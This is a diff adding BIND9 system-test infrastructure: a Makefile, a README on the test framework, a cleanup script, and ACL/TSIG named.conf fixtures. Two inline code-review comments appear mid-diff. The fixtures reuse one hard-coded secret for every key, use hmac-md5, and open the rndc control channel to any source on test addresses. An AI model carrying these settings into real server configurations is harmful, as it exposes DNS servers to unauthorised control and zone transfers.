Diffstat (limited to '')
2465 files changed, 185014 insertions, 0 deletions
diff --git a/bin/tests/system/Makefile.in b/bin/tests/system/Makefile.in
new file mode 100644
index 0000000..7b8b42c
--- /dev/null
+++ b/bin/tests/system/Makefile.in
@@ -0,0 +1,108 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+srcdir = @srcdir@
+VPATH = @srcdir@
+top_srcdir = @top_srcdir@
+
+VERSION=@BIND9_VERSION@
+
+@BIND9_MAKE_INCLUDES@
+
+SUBDIRS = dlzexternal dyndb pipelined rndc rpz rsabigexponent tkey
+
+CINCLUDES = ${ISC_INCLUDES} \
+ ${DNS_INCLUDES} \
+ ${ISCCFG_INCLUDES} \
+ ${IRS_INCLUDES}
+
+CDEFINES = @USE_GSSAPI@ @CONTRIB_DLZ@
+CWARNINGS =
+
+ISCLIBS = ../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@
+DNSLIBS = ../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@
+ISCCFGLIBS = ../../../lib/isccfg/libisccfg.@A@
+IRSLIBS = ../../../lib/irs/libirs.@A@
+
+ISCDEPLIBS = ../../../lib/isc/libisc.@A@
+DNSDEPLIBS = ../../../lib/dns/libdns.@A@
+ISCCFGDEPLIBS = ../../../lib/isccfg/libisccfg.@A@
+IRSDEPLIBS = ../../../lib/irs/libirs.@A@
+
+DEPLIBS = ${IRSDEPLIBS} ${ISCCFGDEPLIBS} ${DNSDEPLIBS} ${ISCDEPLIBS}
+
+LIBS = ${IRSLIBS} ${ISCCFGLIBS} ${DNSLIBS} ${ISCLIBS} @LIBS@
+
+OBJS = feature-test.@O@ resolve.@O@
+SRCS = feature-test.c resolve.c
+
+TARGETS = feature-test@EXEEXT@ resolve@EXEEXT@
+
+@BIND9_MAKE_RULES@
+
+subdirs: ${TARGETS}
+
+feature-test@EXEEXT@: feature-test.@O@
+ ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ feature-test.@O@ ${ISCLIBS} ${LIBS}
+
+resolve@EXEEXT@: resolve.@O@ ${DEPLIBS}
+ ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ \
+ resolve.@O@ ${LIBS}
+
+# Running the scripts below is bypassed when a separate build directory is
+# used.
+
+# Produce intermediate makefile that assigns unique port numbers to each
+# parallel test. The start port number of 5,000 is arbitrary - it must just
+# be greater than the highest privileged port, 1024.
+#
+# Test names need to be sanitized because Solaris make does not like
+# underscores in target names and requires explicit differentiation
+# between a target name and a directory name (.PHONY is not supported).
+
+.PHONY: parallel.mk
+
+parallel.mk:
+ $(SHELL) parallel.sh > parallel.mk
+
+# Targets to run the tests.
+
+test: parallel.mk subdirs
+ @$(MAKE) -f parallel.mk check
+ @$(SHELL) ./runsequential.sh
+ @$(SHELL) ./testsummary.sh
+
+check: test
+
+# Other targets:
+#
+# testclean - delete files generated by running tests.
+# clean - testclean + also delete files built for the tests by "make".
+# distclean - clean + also delete test-related files generated by "configure".
+
+testclean clean distclean::
+ if test -f ./cleanall.sh; then $(SHELL) ./cleanall.sh; fi
+ rm -f systests.output
+ rm -f random.data
+ rm -f parallel.mk
+
+clean distclean::
+ rm -f ${TARGETS}
+ rm -f ${OBJS}
+
+distclean::
+ rm -f conf.sh
+
+installdirs:
+
+install::
+
+uninstall::
diff --git a/bin/tests/system/README b/bin/tests/system/README
new file mode 100644
index 0000000..fc9294d
--- /dev/null
+++ b/bin/tests/system/README
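Review bot: The `feature-test@EXEEXT@` rule in bin/tests/system/Makefile.in lists only `feature-test.@O@` as a prerequisite although its recipe links `${ISCLIBS} ${LIBS}`, whereas the `resolve@EXEEXT@` rule directly below it depends on `${DEPLIBS}`. As written, make will not relink feature-test when libisc or libdns is rebuilt, and under `-j` nothing orders the link after those libraries; if this helper is what the tests use to probe build features (an inference from its name), a stale binary could cause tests to be skipped or run on wrong assumptions. I would write the header as `feature-test@EXEEXT@: feature-test.@O@ ${DEPLIBS}` and drop the extra `${ISCLIBS}` from the link line, since `${LIBS}` already contains it. Separately, the comment above `.PHONY: parallel.mk` says .PHONY is not supported by Solaris make, which reads oddly next to the directive itself; a short remark on why it is still used would help.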
@@ -0,0 +1,724 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Introduction +=== +This directory holds a simple test environment for running bind9 system tests +involving multiple name servers. + +With the exception of "common" (which holds configuration information common to +multiple tests) and "win32" (which holds files needed to run the tests in a +Windows environment), each directory holds a set of scripts and configuration +files to test different parts of BIND. The directories are named for the +aspect of BIND they test, for example: + + dnssec/ DNSSEC tests + forward/ Forwarding tests + glue/ Glue handling tests + +etc. + +Typically each set of tests sets up 2-5 name servers and then performs one or +more tests against them. Within the test subdirectory, each name server has a +separate subdirectory containing its configuration data. These subdirectories +are named "nsN" or "ansN" (where N is a number between 1 and 8, e.g. ns1, ans2 +etc.) + +The tests are completely self-contained and do not require access to the real +DNS. Generally, one of the test servers (usually ns1) is set up as a root +nameserver and is listed in the hints file of the others. + + +Preparing to Run the Tests +=== +To enable all servers to run on the same machine, they bind to separate virtual +IP addresses on the loopback interface. ns1 runs on 10.53.0.1, ns2 on +10.53.0.2, etc. Before running any tests, you must set up these addresses by +running the command + + sh ifconfig.sh up + +as root. The interfaces can be removed by executing the command: + + sh ifconfig.sh down + +... also as root. 
+ +The servers use unprivileged ports (above 1024) instead of the usual port 53, +so they can be run without root privileges once the interfaces have been set +up. + + +Note for MacOS Users +--- +If you wish to make the interfaces survive across reboots, copy +org.isc.bind.system and org.isc.bind.system.plist to /Library/LaunchDaemons +then run + + launchctl load /Library/LaunchDaemons/org.isc.bind.system.plist + +... as root. + + +Running the System Tests +=== + +Running an Individual Test +--- +The tests can be run individually using the following command: + + sh run.sh [flags] <test-name> [<test-arguments>] + +e.g. + + sh run.sh [flags] notify + +Optional flags are: + + -k Keep servers running after the test completes. Each test + usually starts a number of nameservers, either instances + of the "named" being tested, or custom servers (written in + Python or Perl) that feature test-specific behavior. The + servers are automatically started before the test is run + and stopped after it ends. This flag leaves them running + at the end of the test, so that additional queries can be + sent by hand. To stop the servers afterwards, use the + command "sh stop.sh <test-name>". + + -n Noclean - do not remove the output files if the test + completes successfully. By default, files created by the + test are deleted if it passes; they are not deleted if the + test fails. + + -p <number> Sets the range of ports used by the test. A block of 100 + ports is available for each test, the number given to the + "-p" switch being the number of the start of that block + (e.g. "-p 7900" will mean that the test is able to use + ports 7900 through 7999). If not specified, the test will + have ports 5000 to 5099 available to it. + +Arguments are: + + test-name Mandatory. The name of the test, which is the name of the + subdirectory in bin/tests/system holding the test files. + + test-arguments Optional arguments that are passed to each of the test's + scripts. 
+ + +Running All The System Tests +--- +To run all the system tests, enter the command: + + sh runall.sh [-c] [-n] [numproc] + +The optional flag "-c" forces colored output (by default system test output is +not printed in color due to run.sh being piped through "tee"). + +The optional flag "-n" has the same effect as it does for "run.sh" - it causes +the retention of all output files from all tests. + +The optional "numproc" argument specifies the maximum number of tests that can +run in parallel. The default is 1, which means that all of the tests run +sequentially. If greater than 1, up to "numproc" tests will run simultaneously, +new tests being started as tests finish. Each test will get a unique set of +ports, so there is no danger of tests interfering with one another. Parallel +running will reduce the total time taken to run the BIND system tests, but will +mean that the output from all the tests sent to the screen will be mixed up +with one another. However, the systests.output file produced at the end of the +run (in the bin/tests/system directory) will contain the output from each test +in sequential order. + +Note that it is not possible to pass arguments to tests though the "runall.sh" +script. + +A run of all the system tests can also be initiated via make: + + make [-j numproc] test + +In this case, retention of the output files after a test completes successfully +is specified by setting the environment variable SYSTEMTEST_NO_CLEAN to 1 prior +to running make, e.g. + + SYSTEMTEST_NO_CLEAN=1 make [-j numproc] test + +while setting environment variable SYSTEMTEST_FORCE_COLOR to 1 forces system +test output to be printed in color. + + +Running Multiple System Test Suites Simultaneously +--- +In some cases it may be desirable to have multiple instances of the system test +suite running simultaneously (e.g. from different terminal windows). To do +this: + +1. Each installation must have its own directory tree. 
The system tests create +files in the test directories, so separate directory trees are required to +avoid interference between the same test running in the different +installations. + +2. For one of the test suites, the starting port number must be specified by +setting the environment variable STARTPORT before starting the test suite. +Each test suite comprises about 100 tests, each being allocated a set of 100 +ports. The port ranges for each test are allocated sequentially, so each test +suite requires about 10,000 ports to itself. By default, the port allocation +starts at 5,000. So the following set of commands: + + Terminal Window 1: + cd <installation-1>/bin/tests/system + sh runall.sh 4 + + Terminal Window 2: + cd <installation-2>/bin/tests/system + STARTPORT=20000 sh runall.sh 4 + +... will start the test suite for installation-1 using the default base port +of 5,000, so the test suite will use ports 5,000 through 15,000 (or there +abouts). The use of "STARTPORT=20000" to prefix the run of the test suite for +installation-2 will mean the test suite uses ports 20,000 through 30,000 or so. + + +Format of Test Output +--- +All output from the system tests is in the form of lines with the following +structure: + + <letter>:<test-name>:<message> [(<number>)] + +e.g. + + I:catz:checking that dom1.example is not served by master (1) + +The meanings of the fields are as follows: + +<letter> +This indicates the type of message. This is one of: + + S Start of the test + A Start of test (retained for backwards compatibility) + T Start of test (retained for backwards compatibility) + E End of the test + I Information. A test will typically output many of these messages + during its run, indicating test progress. Note that such a message may + be of the form "I:testname:failed", indicating that a sub-test has + failed. + R Result. 
Each test will result in one such message, which is of the + form: + + R:<test-name>:<result> + + where <result> is one of: + + PASS The test passed + FAIL The test failed + SKIPPED The test was not run, usually because some + prerequisites required to run the test are missing. + +<test-name> +This is the name of the test from which the message emanated, which is also the +name of the subdirectory holding the test files. + +<message> +This is text output by the test during its execution. + +(<number>) +If present, this will correlate with a file created by the test. The tests +execute commands and route the output of each command to a file. The name of +this file depends on the command and the test, but will usually be of the form: + + <command>.out.<suffix><number> + +e.g. nsupdate.out.test28, dig.out.q3. This aids diagnosis of problems by +allowing the output that caused the problem message to be identified. + + +Re-Running the Tests +--- +If there is a requirement to re-run a test (or the entire test suite), the +files produced by the tests should be deleted first. Normally, these files are +deleted if the test succeeds but are retained on error. The run.sh script +automatically calls a given test's clean.sh script before invoking its setup.sh +script. + +Deletion of the files produced by the set of tests (e.g. after the execution +of "runall.sh") can be carried out using the command: + + sh cleanall.sh + +or + + make testclean + +(Note that the Makefile has two other targets for cleaning up files: "clean" +will delete all the files produced by the tests, as well as the object and +executable files used by the tests. "distclean" does all the work of "clean" +as well as deleting configuration files produced by "configure".) + + +Developer Notes +=== +This section is intended for developers writing new tests. + + +Overview +--- +As noted above, each test is in a separate directory. 
To interact with the +test framework, the directories contain the following standard files: + +prereq.sh Run at the beginning to determine whether the test can be run at + all; if not, we see a R:SKIPPED result. This file is optional: + if not present, the test is assumed to have all its prerequisites + met. + +setup.sh Run after prereq.sh, this sets up the preconditions for the tests. + Although optional, virtually all tests will require such a file to + set up the ports they should use for the test. + +tests.sh Runs the actual tests. This file is mandatory. + +clean.sh Run at the end to clean up temporary files, but only if the test + was completed successfully and its running was not inhibited by the + "-n" switch being passed to "run.sh". Otherwise the temporary + files are left in place for inspection. + +ns<N> These subdirectories contain test name servers that can be queried + or can interact with each other. The value of N indicates the + address the server listens on: for example, ns2 listens on + 10.53.0.2, and ns4 on 10.53.0.4. All test servers use an + unprivileged port, so they don't need to run as root. These + servers log at the highest debug level and the log is captured in + the file "named.run". + +ans<N> Like ns[X], but these are simple mock name servers implemented in + Perl or Python. They are generally programmed to misbehave in ways + named would not so as to exercise named's ability to interoperate + with badly behaved name servers. + + +Port Usage +--- +In order for the tests to run in parallel, each test requires a unique set of +ports. These are specified by the "-p" option passed to "run.sh", which sets +environment variables that the scripts listed above can reference. + +The convention used in the system tests is that the number passed is the start +of a range of 100 ports. 
The test is free to use the ports as required, +although the first ten ports in the block are named and generally tests use the +named ports for their intended purpose. The names of the environment variables +are: + + PORT Number to be used for the query port. + CONTROLPORT Number to be used as the RNDC control port. + EXTRAPORT1 - EXTRAPORT8 Eight port numbers that can be used as needed. + +Two other environment variables are defined: + + LOWPORT The lowest port number in the range. + HIGHPORT The highest port number in the range. + +Since port ranges usually start on a boundary of 10, the variables are set such +that the last digit of the port number corresponds to the number of the +EXTRAPORTn variable. For example, if the port range were to start at 5200, the +port assignments would be: + + PORT = 5200 + EXTRAPORT1 = 5201 + : + EXTRAPORT8 = 5208 + CONTROLPORT = 5209 + LOWPORT = 5200 + HIGHPORT = 5299 + +When running tests in parallel (i.e. giving a value of "numproc" greater than 1 +in the "make" or "runall.sh" commands listed above), it is guaranteed that each +test will get a set of unique port numbers. + + +Writing a Test +--- +The test framework requires up to four shell scripts (listed above) as well as +a number of nameserver instances to run. Certain expectations are put on each +script: + + +General +--- +1. Each of the four scripts will be invoked with the command + + (cd <test-directory> ; sh <script> [<arguments>] ) + +... so that working directory when the script starts executing is the test +directory. + +2. Arguments can be only passed to the script if the test is being run as a +one-off with "run.sh". In this case, everything on the command line after the +name of the test is passed to each script. For example, the command: + + sh run.sh -p 12300 mytest -D xyz + +... will run "mytest" with a port range of 12300 to 12399. 
Each of the +framework scripts provided by the test will be invoked using the remaining +arguments, e.g.: + + (cd mytest ; sh prereq.sh -D xyz) + (cd mytest ; sh setup.sh -D xyz) + (cd mytest ; sh tests.sh -D xyz) + (cd mytest ; sh clean.sh -D xyz) + +No arguments will be passed to the test scripts if the test is run as part of +a run of the full test suite (e.g. the tests are started with "runall.sh"). + +3. Each script should start with the following lines: + + SYSTEMTESTTOP=.. + . $SYSTEMTESTTOP/conf.sh + +"conf.sh" defines a series of environment variables together with functions +useful for the test scripts. (conf.sh.win32 is the Windows equivalent of this +file.) + + +prereq.sh +--- +As noted above, this is optional. If present, it should check whether specific +software needed to run the test is available and/or whether BIND has been +configured with the appropriate options required. + + * If the software required to run the test is present and the BIND + configure options are correct, prereq.sh should return with a status code + of 0. + + * If the software required to run the test is not available and/or BIND + has not been configured with the appropriate options, prereq.sh should + return with a status code of 1. + + * If there is some other problem (e.g. prerequisite software is available + but is not properly configured), a status code of 255 should be returned. + + +setup.sh +--- +This is responsible for setting up the configuration files used in the test. + +To cope with the varying port number, ports are not hard-coded into +configuration files (or, for that matter, scripts that emulate nameservers). +Instead, setup.sh is responsible for editing the configuration files to set the +port numbers. + +To do this, configuration files should be supplied in the form of templates +containing tokens identifying ports. The tokens have the same name as the +environment variables listed above, but are prefixed and suffixed by the "@" +symbol. 
For example, a fragment of a configuration file template might look +like: + + controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; + }; + + options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + allow-new-zones yes; + }; + +setup.sh should copy the template to the desired filename using the +"copy_setports" shell function defined in "conf.sh", i.e. + + copy_setports ns1/named.conf.in ns1/named.conf + +This replaces the tokens @PORT@, @CONTROLPORT@, @EXTRAPORT1@ through +@EXTRAPORT8@ with the contents of the environment variables listed above. +setup.sh should do this for all configuration files required when the test +starts. + +("setup.sh" should also use this method for replacing the tokens in any Perl or +Python name servers used in the test.) + + +tests.sh +--- +This is the main test file and the contents depend on the test. The contents +are completely up to the developer, although most test scripts have a form +similar to the following for each sub-test: + + 1. n=`expr $n + 1` + 2. echo_i "prime cache nodata.example ($n)" + 3. ret=0 + 4. $DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$n + 5. grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 + 6. grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 + 7. if [ $ret != 0 ]; then echo_i "failed"; fi + 8. status=`expr $status + $ret` + +1. Increment the test number "n" (initialized to zero at the start of the + script). + +2. Indicate that the sub-test is about to begin. Note that "echo_i" instead + of "echo" is used. echo_i is a function defined in "conf.sh" which will + prefix the message with "I:<testname>:", so allowing the output from each + test to be identified within the output. The test number is included in + the message in order to tie the sub-test with its output. + +3. Initialize return status. + +4 - 6. Carry out the sub-test. 
In this case, a nameserver is queried (note + that the port used is given by the PORT environment variable, which was set + by the inclusion of the file "conf.sh" at the start of the script). The + output is routed to a file whose suffix includes the test number. The + response from the server is examined and, in this case, if the required + string is not found, an error is indicated by setting "ret" to 1. + +7. If the sub-test failed, a message is printed. "echo_i" is used to print + the message to add the prefix "I:<test-name>:" before it is output. + +8. "status", used to track how many of the sub-tests have failed, is + incremented accordingly. The value of "status" determines the status + returned by "tests.sh", which in turn determines whether the framework + prints the PASS or FAIL message. + +Regardless of this, rules that should be followed are: + +a. Use the environment variables set by conf.sh to determine the ports to use + for sending and receiving queries. + +b. Use a counter to tag messages and to associate the messages with the output + files. + +c. Store all output produced by queries/commands into files. These files + should be named according to the command that produced them, e.g. "dig" + output should be stored in a file "dig.out.<suffix>", the suffix being + related to the value of the counter. + +d. Use "echo_i" to output informational messages. + +e. Retain a count of test failures and return this as the exit status from + the script. + + +clean.sh +--- +The inverse of "setup.sh", this is invoked by the framework to clean up the +test directory. It should delete all files that have been created by the test +during its run. + + +Starting Nameservers +--- +As noted earlier, a system test will involve a number of nameservers. These +will be either instances of named, or special servers written in a language +such as Perl or Python. 
+ +For the former, the version of "named" being run is that in the "bin/named" +directory in the tree holding the tests (i.e. if "make test" is being run +immediately after "make", the version of "named" used is that just built). The +configuration files, zone files etc. for these servers are located in +subdirectories of the test directory named "nsN", where N is a small integer. +The latter are special nameservers, mostly used for generating deliberately bad +responses, located in subdirectories named "ansN" (again, N is an integer). +In addition to configuration files, these directories should hold the +appropriate script files as well. + +Note that the "N" for a particular test forms a single number space, e.g. if +there is an "ns2" directory, there cannot be an "ans2" directory as well. +Ideally, the directory numbers should start at 1 and work upwards. + +When running a test, the servers are started using "start.sh" (which is nothing +more than a wrapper for start.pl). The options for "start.pl" are documented +in the header for that file, so will not be repeated here. In summary, when +invoked by "run.sh", start.pl looks for directories named "nsN" or "ansN" in +the test directory and starts the servers it finds there. + + +"named" Command-Line Options +--- +By default, start.pl starts a "named" server with the following options: + + -c named.conf Specifies the configuration file to use (so by implication, + each "nsN" nameserver's configuration file must be called + named.conf). + + -d 99 Sets the maximum debugging level. + + -D <name> The "-D" option sets a string used to identify the + nameserver in a process listing. In this case, the string + is the name of the subdirectory. + + -g Runs the server in the foreground and logs everything to + stderr. + + -m record,size,mctx + Turns on these memory usage debugging flags. + + -U 4 Uses four listeners. 
+ + -X named.lock Acquires a lock on this file in the "nsN" directory, so + preventing multiple instances of this named running in this + directory (which could possibly interfere with the test). + +All output is sent to a file called "named.run" in the nameserver directory. + +The options used to start named can be altered. There are three ways of doing +this. "start.pl" checks the methods in a specific order: if a check succeeds, +the options are set and any other specification is ignored. In order, these +are: + +1. Specifying options to "start.sh"/"start.pl" after the name of the test +directory, e.g. + + sh start.sh reclimit ns1 -- "-c n.conf -d 43" + +(This is only really useful when running tests interactively.) + +2. Including a file called "named.args" in the "nsN" directory. If present, +the contents of the first non-commented, non-blank line of the file are used as +the named command-line arguments. The rest of the file is ignored. + +3. Tweaking the default command line arguments with "-T" options. This flag is +used to alter the behavior of BIND for testing and is not documented in the +ARM. The presence of certain files in the "nsN" directory adds flags to +the default command line (the content of the files is irrelevant - it +is only the presence that counts): + + named.noaa Appends "-T noaa" to the command line, which causes + "named" to never set the AA bit in an answer. + + named.dropedns Adds "-T dropedns" to the command line, which causes + "named" to recognise EDNS options in messages, but drop + messages containing them. + + named.maxudp1460 Adds "-T maxudp1460" to the command line, setting the + maximum UDP size handled by named to 1460. + + named.maxudp512 Adds "-T maxudp512" to the command line, setting the + maximum UDP size handled by named to 512. + + named.noedns Appends "-T noedns" to the command line, which disables + recognition of EDNS options in messages. + + named.notcp Adds "-T notcp", which disables TCP in "named". 
+ + named.soa Appends "-T nosoa" to the command line, which disables + the addition of SOA records to negative responses (or to + the additional section if the response is triggered by RPZ + rewriting). + +Starting Other Nameservers +--- +In contrast to "named", nameservers written in Perl or Python (whose script +file should have the name "ans.pl" or "ans.py" respectively) are started with a +fixed command line. In essence, the server is given the address and nothing +else. + +(This is not strictly true: Python servers are provided with the number of the +query port to use. Altering the port used by Perl servers currently requires +creating a template file containing the "@PORT@" token, and having "setup.sh" +substitute the actual port being used before the test starts.) + + +Stopping Nameservers +--- +As might be expected, the test system stops nameservers with the script +"stop.sh", which is little more than a wrapper for "stop.pl". Like "start.pl", +the options available are listed in the file's header and will not be repeated +here. + +In summary though, the nameservers for a given test, if left running by +specifying the "-k" flag to "run.sh" when the test is started, can be stopped +by the command: + + sh stop.sh <test-name> [server] + +... where if the server (e.g. "ns1", "ans3") is not specified, all servers +associated with the test are stopped. + + +Adding a Test to the System Test Suite +--- +Once a test has been created, the following files should be edited: + +* conf.sh.in The name of the test should be added to the PARALLELDIRS or +SEQUENTIALDIRS variables as appropriate. The former is used for tests that +can run in parallel with other tests, the latter for tests that are unable to +do so. + +* conf.sh.win32 This is the Windows equivalent of conf.sh.in. The name of the +test should be added to the PARALLELDIRS or SEQUENTIALDIRS variables as +appropriate. 
+ +* Makefile.in The name of the test should be added to one of the the PARALLEL +or SEQUENTIAL variables. + +(It is likely that a future iteration of the system test suite will remove the +need to edit multiple files to add a test.) + + +Valgrind +--- +When running system tests, named can be run under Valgrind. The output from +Valgrind are sent to per-process files that can be reviewed after the test has +completed. To enable this, set the USE_VALGRIND environment variable to +"helgrind" to run the Helgrind tool, or any other value to run the Memcheck +tool. To use "helgrind" effectively, build BIND with --disable-atomic. + + +Maintenance Notes +=== +This section is aimed at developers maintaining BIND's system test framework. + +Notes on Parallel Execution +--- +Although execution of an individual test is controlled by "run.sh", which +executes the above shell scripts (and starts the relevant servers) for each +test, the running of all tests in the test suite is controlled by the Makefile. +("runall.sh" does little more than invoke "make" on the Makefile.) + +All system tests are capable of being run in parallel. For this to work, each +test needs to use a unique set of ports. To avoid the need to define which +tests use which ports (and so risk port clashes as further tests are added), +the ports are assigned when the tests are run. This is achieved by having the +"test" target in the Makefile depend on "parallel.mk". That file is created +when "make check" is run, and contains a target for each test of the form: + + <test-name>: + @$(SHELL) run.sh -p <baseport> <test-name> + +The <baseport> is unique and the values of <baseport> for each test are +separated by at least 100 ports. + + +Cleaning Up From Tests +--- +When a test is run, up to three different types of files are created: + +1. Files generated by the test itself, e.g. output from "dig" and "rndc", are +stored in the test directory. + +2. 
Files produced by named which may not be cleaned up if named exits +abnormally, e.g. core files, PID files etc., are stored in the test directory. + +3. A file "test.output.<test-name>" containing the text written to stdout by the +test is written to bin/tests/system/. This file is only produced when the test +is run as part of the entire test suite (e.g. via "runall.sh"). + +If the test fails, all these files are retained. But if the test succeeds, +they are cleaned up at different times: + +1. Files generated by the test itself are cleaned up by the test's own +"clean.sh", which is called from "run.sh". + +2. Files that may not be cleaned up if named exits abnormally can be removed +using the "cleanall.sh" script. + +3. "test.output.*" files are deleted when the test suite ends. At this point, +the file "testsummary.sh" is called which concatenates all the "test.output.*" +files into a single "systests.output" file before deleting them. diff --git a/bin/tests/system/acl/clean.sh b/bin/tests/system/acl/clean.sh new file mode 100644 index 0000000..c8d26cc --- /dev/null +++ b/bin/tests/system/acl/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f dig.out.* +rm -f ns2/example.db ns2/tsigzone.db ns2/example.db.jnl +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/_default.nzf +rm -f ns*/_default.nzd* +rm -f ns*/managed-keys.bind* ns*/*.mkeys* 
diff --git a/bin/tests/system/acl/ns2/named1.conf.in b/bin/tests/system/acl/ns2/named1.conf.in
new file mode 100644
index 0000000..745048a
--- /dev/null
+++ b/bin/tests/system/acl/ns2/named1.conf.in
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences yes;
+ check-integrity no;
+};
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+key two {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
+
+zone "tsigzone" {
+ type primary;
+ file "tsigzone.db";
+ allow-transfer { !key one; any; };
+};
diff --git a/bin/tests/system/acl/ns2/named2.conf.in b/bin/tests/system/acl/ns2/named2.conf.in
new file mode 100644
index 0000000..21aa991
--- /dev/null
+++ b/bin/tests/system/acl/ns2/named2.conf.in
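Review bot: Keys `one` and `two` in named1.conf.in are declared with `algorithm hmac-md5;` even though `rndc_key` in the same file already uses hmac-sha256; the same declarations recur in named2.conf.in and in named3.conf.in, which adds key `three`. Nothing in the `allow-transfer` ACLs under test depends on the digest, so `algorithm hmac-sha256;` would stop the fixture modelling a deprecated TSIG algorithm and should keep it loadable on builds where MD5 is unavailable; the client side in tests.sh (not shown here) would need the matching algorithm. The `controls` statement's `allow { any; }` together with the fixed secret `"1234abcd8765"`, which is reused for every key, is tolerable only because the listener is the 10.53.0.2 test address. A one-line comment such as `/* test fixture only: fixed shared secret, control channel open to any source on the test address */` above `key rndc_key` would keep this block from being copied into a real configuration.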
@@ -0,0 +1,65 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + /* + * 0a00::/8 and 10/8 are the same bits, but different address + * families. This should *not* match IPv4 queries from 10.*. + */ + allow-transfer { 0a00::/8; !10/8; key one; }; +}; diff --git a/bin/tests/system/acl/ns2/named3.conf.in b/bin/tests/system/acl/ns2/named3.conf.in new file mode 100644 index 0000000..3208c92 --- /dev/null +++ b/bin/tests/system/acl/ns2/named3.conf.in 
@@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key three { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +acl reject { + !key one; !key two; any; +}; + +acl accept { + 10.53.0.1; 10.53.0.2; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { !reject; accept; }; +}; diff --git a/bin/tests/system/acl/ns2/named4.conf.in b/bin/tests/system/acl/ns2/named4.conf.in new file mode 100644 index 0000000..14e82ed --- /dev/null +++ b/bin/tests/system/acl/ns2/named4.conf.in 
